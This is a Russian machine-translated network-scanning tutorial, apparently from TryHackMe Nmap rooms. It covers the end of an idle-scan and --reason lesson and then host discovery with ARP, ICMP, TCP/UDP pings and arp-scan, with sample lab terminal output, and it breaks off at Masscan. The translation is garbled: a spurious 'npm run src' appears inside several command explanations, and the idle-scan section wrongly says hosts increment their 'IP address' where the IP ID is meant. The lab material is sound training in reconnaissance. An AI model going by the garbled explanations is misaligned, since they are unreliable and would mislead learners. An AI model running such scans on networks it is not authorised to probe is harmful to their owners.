В третьем сценарии целевая машина вообще не отвечает из-за правил брандмауэра . Отсутствие ответа приведет к тому же результату, что и при закрытом порту: неактивный хост не увеличит свой IP-адрес.

На заключительном этапе злоумышленник отправляет еще один SYN/ACK на неактивный хост. Неактивный хост отвечает пакетом RST, снова увеличивая IP-адрес на единицу. Злоумышленнику необходимо сравнить IP-адрес пакета RST, полученного на первом этапе, с IP-адресом пакета RST, полученного на третьем этапе. Если разница равна 1, это означает, что порт на целевой машине был закрыт или отфильтрован. Однако, если разница равна 2, это означает, что порт на целевой машине был открыт.

Стоит повторить, что это сканирование называется сканированием в режиме ожидания, поскольку выбор неактивного хоста имеет решающее значение для точности сканирования. Если «неактивный хост» занят, все возвращаемые IP- адреса будут бесполезны.

Task 8. Getting More Details

Вы можете добавить эту информацию, --reasonесли хотите, чтобы Nmap предоставлял более подробные сведения о своих рассуждениях и выводах. Рассмотрите два приведенных ниже сканирования системы; однако, последнее добавляет --reason.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -sS 10.10.252.27

Starting Nmap 7.60 ( https://nmap.org ) at 2021-08-30 10:39 BST
Nmap scan report for ip-10-10-252-27.eu-west-1.compute.internal (10.10.252.27)
Host is up (0.0020s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
25/tcp  open  smtp
80/tcp  open  http
110/tcp open  pop3
111/tcp open  rpcbind
143/tcp open  imap
MAC Address: 02:45:BF:8A:2D:6B (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.60 seconds

Терминал пентестера

pentester@TryHackMe$ sudo nmap -sS --reason 10.10.252.27

Starting Nmap 7.60 ( https://nmap.org ) at 2021-08-30 10:40 BST
Nmap scan report for ip-10-10-252-27.eu-west-1.compute.internal (10.10.252.27)
Host is up, received arp-response (0.0020s latency).
Not shown: 994 closed ports
Reason: 994 resets
PORT    STATE SERVICE REASON
22/tcp  open  ssh     syn-ack ttl 64
25/tcp  open  smtp    syn-ack ttl 64
80/tcp  open  http    syn-ack ttl 64
110/tcp open  pop3    syn-ack ttl 64
111/tcp open  rpcbind syn-ack ttl 64
143/tcp open  imap    syn-ack ttl 64
MAC Address: 02:45:BF:8A:2D:6B (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.59 seconds

Указание этого --reasonфлага дает нам четкое представление о том, почему Nmap пришел к выводу, что система работает или определенный порт открыт. В приведенном выше выводе консоли мы видим, что система считается онлайн, поскольку Nmap «получил arp-ответ». С другой стороны, мы знаем, что порт SSH считается открытым, поскольку Nmap получил обратно пакет «syn-ack».

Для получения более подробной информации можно использовать команду `p` -vдля подробного вывода или `p` -vvдля еще большей детализации.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -sS -vv 10.10.252.27

Starting Nmap 7.60 ( https://nmap.org ) at 2021-08-30 10:41 BST
Initiating ARP Ping Scan at 10:41
Scanning 10.10.252.27 [1 port]
Completed ARP Ping Scan at 10:41, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:41
Completed Parallel DNS resolution of 1 host. at 10:41, 0.00s elapsed
Initiating SYN Stealth Scan at 10:41
Scanning ip-10-10-252-27.eu-west-1.compute.internal (10.10.252.27) [1000 ports]
Discovered open port 22/tcp on 10.10.252.27
Discovered open port 25/tcp on 10.10.252.27
Discovered open port 80/tcp on 10.10.252.27
Discovered open port 110/tcp on 10.10.252.27
Discovered open port 111/tcp on 10.10.252.27
Discovered open port 143/tcp on 10.10.252.27
Completed SYN Stealth Scan at 10:41, 1.25s elapsed (1000 total ports)
Nmap scan report for ip-10-10-252-27.eu-west-1.compute.internal (10.10.252.27)
Host is up, received arp-response (0.0019s latency).
Scanned at 2021-08-30 10:41:02 BST for 1s
Not shown: 994 closed ports
Reason: 994 resets
PORT    STATE SERVICE REASON
22/tcp  open  ssh     syn-ack ttl 64
25/tcp  open  smtp    syn-ack ttl 64
80/tcp  open  http    syn-ack ttl 64
110/tcp open  pop3    syn-ack ttl 64
111/tcp open  rpcbind syn-ack ttl 64
143/tcp open  imap    syn-ack ttl 64
MAC Address: 02:45:BF:8A:2D:6B (Unknown)

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.59 seconds
           Raw packets sent: 1002 (44.072KB) | Rcvd: 1002 (40.092KB)

Если -vvэто не удовлетворит ваше любопытство, вы можете использовать это -dдля отладки деталей или -ddдля получения еще более подробной информации. Вы можете быть уверены, что использование этого метода -dсоздаст вывод, выходящий за рамки одного экрана.

Task 9. Summary

В этом кабинете проводились следующие виды сканирования.

Эти типы сканирования основаны на неожиданной установке флагов TCP для запроса ответа от портов. Сканирование Null, FIN и Xmas вызывает ответ от закрытых портов, в то время как сканирование Maimon, ACK и Window вызывает ответ от открытых и закрытых портов.

Основная группа обучения ИБ
Lab-группу с полезным софтом / книгами / аудио.
Чат для обсуждений, задавай свои вопросы.
P.S. С вами был @Fnay_Offensive
До новой встречи, user_name!

Узнайте, как использовать Nmap для обнаружения активных хостов с помощью сканирования ARP, сканирования ICMP и сканирования TCP/UDP с помощью команды ping.

Task 1. Introduction

Nmap , сокращение от Network Mapper, — это бесплатное программное обеспечение с открытым исходным кодом, распространяемое под лицензией GPL, созданное Гордоном Лайоном (Фёдором), экспертом по сетевой безопасности и программистом, работающим с открытым исходным кодом. Nmap — это стандартный инструмент для построения карт сетей, идентификации активных хостов и обнаружения запущенных служб.

Скриптовый движок Nmap позволяет расширить его функциональность, от идентификации служб до эксплуатации уязвимостей. Сканирование с помощью Nmap обычно проходит этапы, показанные на рисунке ниже, хотя многие из них являются необязательными и зависят от аргументов командной строки.

Цели обучения

Когда мы хотим нацелиться на определенную сеть, нам нужен эффективный инструмент, который поможет нам справляться с повторяющимися задачами и ответит на следующие вопросы:

1. Какие системы работают?
2. Какие службы работают в этих системах?

В этой комнате дается ответ на первый вопрос о поиске работающих компьютеров. Эта комната — первая из четырех комнат Nmap . Ответ на второй вопрос об обнаружении запущенных служб дается в следующих комнатах Nmap , посвященных сканированию портов.

В этом разделе объясняется, какие шаги предпринимает Nmap для обнаружения работающих систем перед сканированием портов. Этот этап имеет решающее значение, поскольку попытка сканирования портов офлайн-систем приведет лишь к пустой трате времени и созданию ненужного сетевого шума.

Мы представляем различные подходы, которые Nmap использует для обнаружения активных хостов. В частности, мы рассматриваем:

1. ARP- сканирование : это сканирование использует ARP- запросы для обнаружения активных хостов.
2. ICMP-сканирование : это сканирование использует ICMP-запросы для идентификации активных хостов.
3. Сканирование TCP / UDP с помощью команды ping : это сканирование отправляет пакеты на TCP- и UDP- порты для определения активных хостов.

Мы также представляем два сканера, arp-scanи masscan, и объясняем, как они пересекаются с частью механизма обнаружения хостов Nmap .

Предварительные условия обучения

• Основы веб-приложений
• Основы работы в сети
• Сетевые протоколы безопасности

В следующем задании давайте углубимся в изучение некоторых важных концепций, прежде чем приступать к поиску работающих хостов.

Task 2. Subnetworks

Прежде чем перейти к основным задачам, давайте повторим несколько терминов. Сетевой сегмент — это группа компьютеров, соединенных с помощью общей среды передачи данных. Например, средой передачи может быть коммутатор Ethernet или точка доступа Wi-Fi. В IP-сети подсеть обычно представляет собой один или несколько сетевых сегментов, соединенных вместе и настроенных на использование одного и того же маршрутизатора. Сетевой сегмент обозначает физическое соединение, а подсеть — логическое соединение.

На приведенной ниже сетевой схеме представлены четыре сетевых сегмента или подсети. В общем, ваша система будет подключена к одному из этих сетевых сегментов/подсетей. Подсеть, или просто подсеть, имеет свой собственный диапазон IP-адресов и подключается к более обширной сети через маршрутизатор. В зависимости от сети может быть установлен брандмауэр, обеспечивающий соблюдение политик безопасности.

На рисунке выше показаны два типа подсетей:

• Подсети с маской подсети /16, что означает, что маска подсети может быть записана как 255.255.0.0. Эта подсеть может вместить около 65 000 хостов.
• Подсети с /24, что указывает на возможность выражения маски подсети как 255.255.255.0. Такая подсеть может содержать около 250 хостов.

Если вам нужно узнать больше о подсетях, вы можете обратиться к заданию 2 в комнате «Введение в локальные сети» .

В рамках активной разведки мы хотим получить больше информации о группе хостов или о подсети. Если вы находитесь в одной подсети, вы ожидаете, что ваш сканер будет использовать запросы ARP (Address Resolution Protocol ) для обнаружения активных хостов. Цель запроса ARP — получить аппаратный адрес (MAC-адрес), чтобы обеспечить связь на канальном уровне; однако мы можем предположить, что хост находится в сети. (Мы вернемся к канальному уровню в Задании 4.)

Если вы находитесь в сети A, вы можете использовать ARP только для обнаружения устройств в этой подсети (10.1.100.0/24). Предположим, вы подключены к подсети, отличной от подсети целевой системы (систем). В этом случае все пакеты, генерируемые вашим сканером, будут маршрутизироваться через шлюз по умолчанию (маршрутизатор) для достижения систем в другой подсети; однако ARP- запросы не будут маршрутизироваться и, следовательно, не смогут пройти через маршрутизатор подсети. ARP — это протокол канального уровня, и ARP- пакеты привязаны к своей подсети.

Нажмите кнопку «Просмотреть сайт», чтобы запустить сетевой симулятор. Мы будем использовать этот симулятор для ответа на вопросы заданий 2, 4 и 5.

Вопрос: Сколько устройств могут увидеть ARP-запрос?

Ответ: 4

Вопрос: Получил ли компьютер 6 ARP-запрос? (Да/Нет)

Ответ: N

Вопрос: Отправьте пакет со следующим содержимым:

• С компьютера4
• Для компьютера 4 (чтобы указать, что это трансляция)
• Тип пакета: «ARP-запрос»
• Данные: computer6 (поскольку мы запрашиваем MAC-адрес компьютера computer6 с помощью ARP-запроса)

Сколько устройств могут увидеть ARP-запрос?

Ответ: 4

Вопрос: Ответил ли компьютер 6 на ARP-запрос? (Да/Нет)

Ответ: Yea

Task 3. Enumerating Targets

В задании 1 мы упомянули различные методы сканирования. Прежде чем подробно объяснить каждый из них и протестировать на реальном объекте, необходимо указать объекты, которые мы хотим сканировать. Как правило, можно указать список, диапазон или подсеть. Примеры указания объектов:

• список: MACHINE_IP scanme.nmap.org example.comбудет просканировано 3 IP-адреса.
• диапазон: 10.11.12.15-20будет просканировано 6 IP-адресов: 10.11.12.15, 10.11.12.16,… и 10.11.12.20.
• Подсеть: MACHINE_IP/30будет просканировано 4 IP-адреса.

Вы также можете указать файл в качестве входных данных для списка целей nmap -iL list_of_hosts.txt.

Если вы хотите проверить список хостов, которые будет сканировать Nmap , вы можете использовать опцию ` nmap -sL TARGETS--`. Эта опция предоставляет подробный список хостов, которые будет сканировать Nmap, без фактического сканирования; однако Nmap попытается выполнить обратное разрешение DNS для всех целей, чтобы получить их имена. Имена могут раскрыть различную информацию для пентестера. (Если вы не хотите, чтобы Nmap обращался к DNS-серверу, вы можете добавить ` -n--`.)

Запустите AttackBox, используя Start AttackBoxкнопку ниже. После открытия в режиме разделенного экрана откройте окно Terminalи используйте его Nmapдля ответа на следующие вопросы.

Task 4. Discovering Live Hosts

Давайте вернемся к уровням TCP /IP, показанным на следующем рисунке. Мы будем использовать эти протоколы для обнаружения активных хостов. Начиная снизу вверх, мы можем использовать:

• ARP с канального уровня
• ICMP с сетевого уровня
• TCP с транспортного уровня
• UDP с транспортного уровня

Прежде чем подробно обсуждать, как можно использовать каждый сканер, мы кратко рассмотрим эти четыре протокола. ARP имеет одну цель: отправить кадр на широковещательный адрес в сетевом сегменте и запросить у компьютера с определенным IP-адресом ответ, предоставив его MAC-адрес (аппаратный адрес).

ICMP имеет множество типов . ICMP-запрос ping использует тип 8 (эхо) и тип 0 (эхо-ответ).

Если вы хотите отправить ping-запрос системе, находящейся в той же подсети, перед ICMP-эхо-запросом следует выполнить ARP- запрос.

Хотя TCP и UDP являются протоколами транспортного уровня, для сканирования сети сканер может отправить специально сформированный пакет на распространенные порты TCP или UDP , чтобы проверить, отвечает ли целевой сервер. Этот метод эффективен, особенно когда блокируется ICMP Echo.

Если вы закрыли сетевой симулятор, нажмите View Siteкнопку « » Task 2для его повторного отображения.

Task 5. Nmap Host Discovery Using ARP

Как узнать, какие хосты работают? Крайне важно избегать траты времени на сканирование портов неактивных хостов или IP-адресов, которые не используются. Существуют различные способы обнаружения работающих хостов. Если параметры обнаружения хостов отсутствуют, Nmap использует следующие подходы для обнаружения активных хостов:

1. Когда привилегированный пользователь пытается сканировать цели в локальной сети (Ethernet), Nmap использует ARP- запросы . Привилегированным пользователем считается rootпользователь, принадлежащий к группе sudoersи имеющий право запускать соответствующие программы sudo.
2. Когда привилегированный пользователь пытается сканировать цели за пределами локальной сети, Nmap использует запросы эхо ICMP, подтверждение TCP ACK (Acknowledge) на порт 80, синхронизацию TCP SYN (Synchronize) на порт 443 и запрос метки времени ICMP.
3. Когда непривилегированный пользователь пытается сканировать цели за пределами локальной сети, Nmap прибегает к трехстороннему TCP-рукопожатию, отправляя SYN-пакеты на порты 80 и 443.

По умолчанию Nmap использует сканирование с помощью команды ping для поиска активных хостов, а затем продолжает сканирование только активных хостов. Если вы хотите использовать Nmap для обнаружения онлайн-хостов без сканирования портов активных систем, вы можете выполнить команду nmap -sn TARGETS. Давайте разберемся подробнее, чтобы получить полное представление о различных используемых методах.

Сканирование ARP возможно только в том случае, если вы находитесь в той же подсети, что и целевые системы. В сетях Ethernet (802.3) и WiFi (802.11) необходимо знать MAC-адрес любой системы, прежде чем вы сможете с ней взаимодействовать. MAC-адрес необходим для заголовка канального уровня; он содержит MAC-адреса источника и назначения, а также другие поля. Чтобы получить MAC-адрес, операционная система отправляет ARP-запрос. Хост, отвечающий на ARP-запросы, считается активным. ARP-запрос работает только в том случае, если целевая система находится в той же подсети, что и вы, то есть в той же сети Ethernet/Wi-Fi. Во время сканирования локальной сети с помощью Nmap следует ожидать появления множества ARP-запросов. Если вы хотите, чтобы Nmap выполнял только сканирование ARP без сканирования портов, вы можете использовать команду `npm run src` nmap -PR -sn TARGETS, где ` -PRnpm run src` указывает, что вам нужно только сканирование ARP. В следующем примере показано, как Nmap использует ARP для обнаружения хостов без сканирования портов. Мы запускаем команду `npm run src` nmap -PR -sn MACHINE_IP/24для обнаружения всех активных систем в той же подсети, что и наша целевая машина.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -PR -sn 10.10.210.6/24

Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-02 07:12 BST
Nmap scan report for ip-10-10-210-75.eu-west-1.compute.internal (10.10.210.75)
Host is up (0.00013s latency).
MAC Address: 02:83:75:3A:F2:89 (Unknown)
Nmap scan report for ip-10-10-210-100.eu-west-1.compute.internal (10.10.210.100)
Host is up (-0.100s latency).
MAC Address: 02:63:D0:1B:2D:CD (Unknown)
Nmap scan report for ip-10-10-210-165.eu-west-1.compute.internal (10.10.210.165)
Host is up (0.00025s latency).
MAC Address: 02:59:79:4F:17:B7 (Unknown)
Nmap scan report for ip-10-10-210-6.eu-west-1.compute.internal (10.10.210.6)
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.12 seconds

В данном случае, AttackBoxимея IP-адрес 10.10.210.6, Nmap использовал ARP-запросы для обнаружения активных хостов в той же подсети. ARP-сканирование работает, как показано на рисунке ниже. Nmap отправляет ARP-запросы всем целевым компьютерам, и те, которые находятся в сети, должны ответить ARP-ответом.

Если мы посмотрим на пакеты, сгенерированные с помощью таких инструментов, как tcpdump или Wireshark, мы увидим сетевой трафик, похожий на показанный ниже. На рисунке ниже Wireshark отображает MAC-адреса источника и назначения, протокол и запрос для каждого ARP-запроса. Адрес источника — это MAC-адрес нашего AttackBox, а адрес назначения — широковещательный адрес, поскольку MAC-адрес цели нам неизвестен. Однако IP-адрес цели можно увидеть в столбце Info. На рисунке видно, что мы запрашиваем MAC-адреса всех IP-адресов в подсети, начиная с 10.10.210.1. Хост с запрашиваемым IP-адресом отправит ARP- ответ со своим MAC-адресом, и именно так мы узнаем, что он находится в сети.

Говоря о сканировании ARP , следует упомянуть сканер, построенный на основе ARP- запросов: arp-scan; он предоставляет множество опций для настройки сканирования. Для получения подробной информации посетите вики-страницу arp -scan . Один из популярных вариантов — arp-scan --localnetили просто arp-scan -l. Эта команда отправит ARP- запросы на все действительные IP-адреса в вашей локальной сети. Более того, если ваша система имеет более одного интерфейса и вы заинтересованы в обнаружении активных хостов на одном из них, вы можете указать интерфейс с помощью -I. Например, sudo arp-scan -I eth0 -lотправит ARP- запросы на все действительные IP-адреса на этом eth0интерфейсе.

Обратите внимание, что arp-scanон не установлен на AttackBox; однако его можно установить с помощью apt install arp-scan.

В приведенном ниже примере мы просканировали подсеть AttackBox с помощью arp-scan ATTACKBOX_IP/24. Поскольку мы выполнили это сканирование в промежутке времени, близком к предыдущему nmap -PR -sn ATTACKBOX_IP/24, мы получили те же три активные цели.

Терминал пентестера

pentester@TryHackMe$ sudo arp-scan 10.10.210.6/24
Interface: eth0, datalink type: EN10MB (Ethernet)
WARNING: host part of 10.10.210.6/24 is non-zero
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.10.210.75	02:83:75:3a:f2:89	(Unknown)
10.10.210.100	02:63:d0:1b:2d:cd	(Unknown)
10.10.210.165	02:59:79:4f:17:b7	(Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.726 seconds (93.91 hosts/sec). 3 responded

Аналогичным образом, команда arp-scanсгенерирует множество ARP- запросов, которые мы можем просмотреть с помощью tcpdump, Wireshark или аналогичного инструмента. Мы можем заметить, что захват пакетов arp-scanпоказывает nmap -PR -snсхожие закономерности трафика. Ниже приведен вывод Wireshark.

Если вы закрыли сетевой симулятор, нажмите Visit Siteкнопку « » в задании 2, чтобы снова открыть его.

Task 6. Nmap Host Discovery Using ICMP

Мы можем отправить ping-запрос на каждый IP-адрес в целевой сети и посмотреть, кто ответит на наши pingзапросы (ICMP Type 8/Echo) ответным ping-запросом (ICMP Type 0). Просто, не правда ли? Хотя это был бы самый простой подход, он не всегда надежен. Многие брандмауэры блокируют ICMP-эхо-запросы; в новых версиях MS Windows настроен брандмауэр хоста, который по умолчанию блокирует запросы ICMP-эхо. Помните, что ARP-запрос предшествует ICMP-запросу, если ваша цель находится в той же подсети.

Чтобы использовать ICMP-запрос эхо-ответа для обнаружения активных хостов, добавьте опцию -PE. (Не забудьте добавить её, -snесли вы не хотите после этого выполнять сканирование портов.)

Как показано на следующем рисунке, сканирование ICMP echo отправляет запрос ICMP echo и ожидает, что целевой объект ответит ответом ICMP echo, если он находится в сети.

В приведенном ниже примере мы просканировали подсеть целевого объекта с помощью команды `npm run src` nmap -PE -sn MACHINE_IP/24. Это сканирование отправит эхо-пакеты ICMP на каждый IP-адрес в подсети. Мы ожидаем ответа от работающих хостов; однако следует помнить, что многие брандмауэры блокируют ICMP. В приведенном ниже выводе показан результат сканирования подсети класса C виртуальной машины с помощью команды `npm run src` sudo nmap -PE -sn MACHINE_IP/24из AttackBox.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -PE -sn 10.10.68.220/24

Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-02 10:16 BST
Nmap scan report for ip-10-10-68-50.eu-west-1.compute.internal (10.10.68.50)
Host is up (0.00017s latency).
MAC Address: 02:95:36:71:5B:87 (Unknown)
Nmap scan report for ip-10-10-68-52.eu-west-1.compute.internal (10.10.68.52)
Host is up (0.00017s latency).
MAC Address: 02:48:E8:BF:78:E7 (Unknown)
Nmap scan report for ip-10-10-68-77.eu-west-1.compute.internal (10.10.68.77)
Host is up (-0.100s latency).
MAC Address: 02:0F:0A:1D:76:35 (Unknown)
Nmap scan report for ip-10-10-68-110.eu-west-1.compute.internal (10.10.68.110)
Host is up (-0.10s latency).
MAC Address: 02:6B:50:E9:C2:91 (Unknown)
Nmap scan report for ip-10-10-68-140.eu-west-1.compute.internal (10.10.68.140)
Host is up (0.00021s latency).
MAC Address: 02:58:59:63:0B:6B (Unknown)
Nmap scan report for ip-10-10-68-142.eu-west-1.compute.internal (10.10.68.142)
Host is up (0.00016s latency).
MAC Address: 02:C6:41:51:0A:0F (Unknown)
Nmap scan report for ip-10-10-68-220.eu-west-1.compute.internal (10.10.68.220)
Host is up (0.00026s latency).
MAC Address: 02:25:3F:DB:EE:0B (Unknown)
Nmap scan report for ip-10-10-68-222.eu-west-1.compute.internal (10.10.68.222)
Host is up (0.00025s latency).
MAC Address: 02:28:B1:2E:B0:1B (Unknown)
Nmap done: 256 IP addresses (8 hosts up) scanned in 2.11 seconds

Результаты сканирования показывают, что активны 8 хостов, а также их MAC-адреса. Как правило, мы не ожидаем узнать MAC-адреса целевых устройств, если они не находятся в той же подсети, что и наша система. Приведенные выше данные указывают на то, что Nmap не потребовалось отправлять ICMP-пакеты, поскольку он подтвердил активность этих хостов на основе полученных ARP-ответов.

Мы повторим описанное выше сканирование; однако на этот раз мы будем сканировать с системы, находящейся в другой подсети. Результаты будут аналогичными, но без MAC-адресов.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -PE -sn 10.10.68.220/24

Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-02 12:16 EEST
Nmap scan report for 10.10.68.50
Host is up (0.12s latency).
Nmap scan report for 10.10.68.52
Host is up (0.12s latency).
Nmap scan report for 10.10.68.77
Host is up (0.11s latency).
Nmap scan report for 10.10.68.110
Host is up (0.11s latency).
Nmap scan report for 10.10.68.140
Host is up (0.11s latency).
Nmap scan report for 10.10.68.142
Host is up (0.11s latency).
Nmap scan report for 10.10.68.220
Host is up (0.11s latency).
Nmap scan report for 10.10.68.222
Host is up (0.11s latency).
Nmap done: 256 IP addresses (8 hosts up) scanned in 8.26 seconds

Если вы проанализируете сетевые пакеты с помощью такого инструмента, как Wireshark, вы увидите нечто похожее на изображение ниже. Вы можете заметить, что у нас есть один исходный IP-адрес в другой подсети, чем целевая подсеть, и мы отправляем запросы ICMP echo всем IP-адресам в целевой подсети, чтобы узнать, кто ответит.

Поскольку запросы ICMP echo обычно блокируются, вы также можете рассмотреть запросы ICMP Timestamp или ICMP Address Mask, чтобы определить, находится ли система в сети. Nmap использует запрос временной метки (ICMP Type 13) и проверяет, получит ли он ответ с временной меткой (ICMP Type 14). Добавление этой -PPопции указывает Nmap использовать запросы ICMP временной метки. Как показано на рисунке ниже, вы ожидаете ответа от активных хостов.

В следующем примере мы запускаем команду nmap -PP -sn MACHINE_IP/24для обнаружения компьютеров, находящихся в сети в целевой подсети.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -PP -sn 10.10.68.220/24

Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-02 12:06 EEST
Nmap scan report for 10.10.68.50
Host is up (0.13s latency).
Nmap scan report for 10.10.68.52
Host is up (0.25s latency).
Nmap scan report for 10.10.68.77
Host is up (0.14s latency).
Nmap scan report for 10.10.68.110
Host is up (0.14s latency).
Nmap scan report for 10.10.68.140
Host is up (0.15s latency).
Nmap scan report for 10.10.68.209
Host is up (0.14s latency).
Nmap scan report for 10.10.68.220
Host is up (0.14s latency).
Nmap scan report for 10.10.68.222
Host is up (0.14s latency).
Nmap done: 256 IP addresses (8 hosts up) scanned in 10.93 seconds

Аналогично предыдущему сканированию ICMP, это сканирование отправит множество запросов ICMP с временной меткой на каждый действительный IP-адрес в целевой подсети. На скриншоте Wireshark ниже вы можете увидеть, как один исходный IP-адрес отправляет пакеты ICMP на каждый возможный IP-адрес для обнаружения работающих хостов.

Аналогично, Nmap использует запросы маски адреса (ICMP типа 17) и проверяет, получает ли он ответ с маской адреса (ICMP типа 18). Это сканирование можно включить с помощью опции -PM. Как показано на рисунке ниже, ожидается, что активные хосты будут отвечать на запросы ICMP с маской адреса.

В попытке обнаружить активные хосты с помощью запросов ICMP-адресной маски мы запускаем команду nmap -PM -sn MACHINE_IP/24. Хотя предыдущие сканирования показали, что активны как минимум 8 хостов, это сканирование не дало результатов. Причина в том, что целевая система или межсетевой экран на маршруте блокируют этот тип ICMP-пакетов. Поэтому важно изучить несколько подходов для достижения одного и того же результата. Если блокируется один тип пакетов, мы всегда можем выбрать другой для обнаружения целевой сети и служб.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -PM -sn 10.10.68.220/24

Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-02 12:13 EEST
Nmap done: 256 IP addresses (0 hosts up) scanned in 52.17 seconds

Хотя мы не получили никакого ответа и не смогли определить, какие хосты были в сети, важно отметить, что в ходе сканирования были отправлены запросы ICMP с маской адреса на каждый действительный IP-адрес, и ожидался ответ. Каждый запрос ICMP был отправлен дважды, как показано на скриншоте ниже.

Task 7. Nmap Host Discovery Using TCP and UDP

TCP SYN Ping

Мы можем отправить пакет с установленным флагом SYN (синхронизация) на TCP- порт (по умолчанию 80) и дождаться ответа. Открытый порт должен ответить SYN/ACK (подтверждение); закрытый порт приведет к RST (сброс). В этом случае мы проверяем только наличие ответа, чтобы определить, активен ли хост. Конкретное состояние порта здесь не имеет значения. Рисунок ниже напоминает о том, как обычно работает трехстороннее рукопожатие TCP .

Если вы хотите, чтобы Nmap использовал TCP SYN ping, вы можете сделать это с помощью опции, -PSза которой следует номер порта, диапазон, список или их комбинация. Например, -PS21будет нацелен на порт 21, в то время как -PS21-25будет нацелен на порты 21, 22, 23, 24 и 25. Наконец, -PS80,443,8080будет нацелен на три порта: 80, 443 и 8080.

Привилегированные пользователи (root и sudo) могут отправлять пакеты TCP SYN и не обязаны завершать трехстороннее рукопожатие TCP, даже если порт открыт, как показано на рисунке ниже. Непривилегированные пользователи вынуждены завершать трехстороннее рукопожатие, если порт открыт.

Мы запустим nmap -PS -sn MACHINE_IP/24сканирование целевой подсети виртуальных машин. Как показано в приведенном ниже выводе, мы обнаружили пять хостов.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -PS -sn 10.10.68.220/24
Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-02 13:45 EEST
Nmap scan report for 10.10.68.52
Host is up (0.10s latency).
Nmap scan report for 10.10.68.121
Host is up (0.16s latency).
Nmap scan report for 10.10.68.125
Host is up (0.089s latency).
Nmap scan report for 10.10.68.134
Host is up (0.13s latency).
Nmap scan report for 10.10.68.220
Host is up (0.11s latency).
Nmap done: 256 IP addresses (5 hosts up) scanned in 17.38 seconds

Давайте подробнее рассмотрим, что происходило за кулисами, изучив сетевой трафик в Wireshark на рисунке ниже. Технически говоря, поскольку мы не указывали никаких TCP-портов для использования в сканировании TCP ping, Nmap использовал TCP-порт по умолчанию, 80. Ожидается, что любая служба, прослушивающая порт 80, ответит, косвенно указывая на то, что хост находится в сети.

TCP ACK Пинг

Как вы уже догадались, это отправляет пакет с установленным флагом ACK. Для этого необходимо запускать Nmap от имени привилегированного пользователя. Если вы попытаетесь сделать это от имени непривилегированного пользователя, Nmap попытается выполнить трехстороннее рукопожатие.

По умолчанию используется порт 80. Синтаксис аналогичен TCP SYN ping. -PAдолжен сопровождаться номером порта, диапазоном номеров портов, списком или их комбинацией. Например, рассмотрим -PA21, -PA21-25и -PA80,443,8080. Если порт не указан, будет использоваться порт 80.

На следующем рисунке показано, что любой TCP-пакет с установленным флагом ACK должен получить ответ в виде TCP-пакета с RSTустановленным флагом. Целевой хост отвечает с RSTустановленным флагом, поскольку TCP-пакет с флагом ACK не является частью какого-либо текущего соединения. Ожидаемый ответ используется для определения того, активен ли целевой хост.

В этом примере мы запускаем sudo nmap -PA -sn MACHINE_IP/24проверку доступности хостов в подсети целевого объекта. Мы видим, что сканирование TCP ACK ping обнаружило пять хостов как активных.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -PA -sn 10.10.68.220/24
Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-02 13:46 EEST
Nmap scan report for 10.10.68.52
Host is up (0.11s latency).
Nmap scan report for 10.10.68.121
Host is up (0.12s latency).
Nmap scan report for 10.10.68.125
Host is up (0.10s latency).
Nmap scan report for 10.10.68.134
Host is up (0.10s latency).
Nmap scan report for 10.10.68.220
Host is up (0.10s latency).
Nmap done: 256 IP addresses (5 hosts up) scanned in 29.89 seconds

Если мы взглянем на сетевой трафик, как показано на рисунке ниже, мы обнаружим множество пакетов с установленным флагом ACK, отправленных на порт 80 целевых систем. Nmap отправляет каждый пакет дважды. Системы, которые не отвечают, находятся в автономном режиме или недоступны.

UDP Пинг

Наконец, мы можем использовать UDP для определения того, находится ли хост в сети. В отличие от TCP SYN ping, отправка UDP-пакета на открытый порт, как правило, не приводит к ответу. Однако, если мы отправим UDP-пакет на закрытый UDP-порт, мы ожидаем получить ICMP-пакет "порт недоступен"; это указывает на то, что целевая система активна и доступна.

На следующем рисунке показан UDP-пакет, отправленный на открытый UDP-порт, который не вызывает никакой реакции. Однако отправка UDP-пакета на любой закрытый UDP-порт может вызвать реакцию, косвенно указывающую на то, что целевой объект находится в сети.

Синтаксис для указания портов аналогичен синтаксису TCP SYN ping и TCP ACK ping; Nmap использует -PUдля UDP ping. В следующем примере мы выполняем сканирование UDP и обнаруживаем пять активных хостов.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -PU -sn 10.10.68.220/24
Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-02 13:45 EEST
Nmap scan report for 10.10.68.52
Host is up (0.10s latency).
Nmap scan report for 10.10.68.121
Host is up (0.10s latency).
Nmap scan report for 10.10.68.125
Host is up (0.14s latency).
Nmap scan report for 10.10.68.134
Host is up (0.096s latency).
Nmap scan report for 10.10.68.220
Host is up (0.11s latency).
Nmap done: 256 IP addresses (5 hosts up) scanned in 9.20 seconds

Давайте рассмотрим сгенерированные UDP-пакеты. На следующем скриншоте Wireshark мы видим, что Nmap отправляет UDP-пакеты на UDP-порты, которые, скорее всего, закрыты. На изображении ниже показано, что Nmap использует необычный UDP-порт для запуска ошибки ICMP «недоступен адрес назначения (порт недоступен)».

Масскан

В качестве дополнительной информации следует отметить, что Masscan использует аналогичный подход для обнаружения доступных систем. Однако, чтобы быстро завершить сканирование сети, Masscan довольно агрессивно генерирует пакеты. Синтаксис довольно похож: -pза ним может следовать номер порта, список или диапазон. Рассмотрим следующие примеры:

